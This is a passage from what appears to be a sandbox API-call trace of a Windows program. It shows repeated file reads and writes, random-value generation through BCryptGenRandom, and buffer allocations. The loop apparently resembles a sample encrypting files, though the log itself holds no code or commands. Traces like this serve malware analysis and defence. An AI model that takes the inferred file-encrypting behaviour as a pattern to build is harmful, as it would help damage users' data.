CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.937] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1e74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.942] CloseHandle (hObject=0x3cc) returned 1 [0147.942] free (_Block=0x3df0008) [0147.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0147.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0147.952] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.953] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.953] free (_Block=0x3e305b8) [0147.953] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.953] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.953] free (_Block=0x1fa91d0) [0147.953] free (_Block=0x1fa2ed8) [0147.953] free (_Block=0x1fa90b8) [0147.953] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.955] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.967] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x37e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.969] CloseHandle (hObject=0x3cc) returned 1 [0147.969] free (_Block=0x3df0008) [0147.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0147.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0147.980] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.980] free (_Block=0x3e305b8) [0147.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.980] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.980] free (_Block=0x1fa91d0) [0147.980] free (_Block=0x1fa2ed8) [0147.980] free (_Block=0x1fa90b8) [0147.980] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.982] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.106] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x843a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.151] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x44fe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.153] CloseHandle (hObject=0x3cc) returned 1 [0148.153] free (_Block=0x3df0008) [0148.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.177] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0148.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.178] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0148.178] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.178] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.178] free (_Block=0x3e305b8) [0148.178] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.179] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.179] free (_Block=0x1fa91d0) [0148.179] free (_Block=0x1fa2ed8) [0148.179] free (_Block=0x1fa90b8) [0148.179] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.179] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.181] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.181] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.182] CloseHandle (hObject=0x3cc) returned 1 [0148.182] free (_Block=0x3df0008) [0148.182] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0148.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0148.192] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.192] free (_Block=0x3e305b8) [0148.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.192] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.193] free (_Block=0x1fa91d0) [0148.193] free (_Block=0x1fa2ed8) [0148.193] free (_Block=0x1fa90b8) [0148.193] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.194] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x19d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.206] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1500, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.207] CloseHandle (hObject=0x3cc) returned 1 [0148.208] free (_Block=0x3df0008) [0148.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0148.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0148.215] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.215] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.215] free (_Block=0x3e305b8) [0148.215] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.215] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.216] free (_Block=0x1fa91d0) [0148.216] free (_Block=0x1fa2ed8) [0148.216] free (_Block=0x1fa90b8) [0148.216] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.217] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.218] CloseHandle (hObject=0x3cc) returned 1 [0148.218] free (_Block=0x3df0008) [0148.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0148.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0148.226] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.226] free (_Block=0x3e305b8) [0148.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.226] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.227] free (_Block=0x1fa91d0) [0148.227] free (_Block=0x1fa2ed8) [0148.227] free (_Block=0x1fa90b8) [0148.227] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.228] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.228] CloseHandle (hObject=0x3cc) returned 1 [0148.229] free (_Block=0x3df0008) [0148.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0148.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0148.237] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.237] free (_Block=0x3e305b8) [0148.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.237] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.237] free (_Block=0x1fa91d0) [0148.237] free (_Block=0x1fa2ed8) [0148.237] free (_Block=0x1fa90b8) [0148.237] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.239] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.248] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3040, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.260] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2480, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.261] CloseHandle (hObject=0x3cc) returned 1 [0148.261] free (_Block=0x3df0008) [0148.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0148.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0149.092] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0149.093] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.093] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.093] free (_Block=0x3e305b8) [0149.093] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.093] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.093] free (_Block=0x1fa91d0) [0149.093] free (_Block=0x1fa2ed8) [0149.093] free (_Block=0x1fa90b8) [0149.093] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.095] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.096] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.207] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0149.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.208] CloseHandle (hObject=0x3cc) returned 1 [0149.208] free (_Block=0x3df0008) [0149.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0149.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0149.233] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.233] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.233] free (_Block=0x3e305b8) [0149.233] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.233] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.234] free (_Block=0x1fa91d0) [0149.234] free (_Block=0x1fa2ed8) [0149.234] free (_Block=0x1fa90b8) 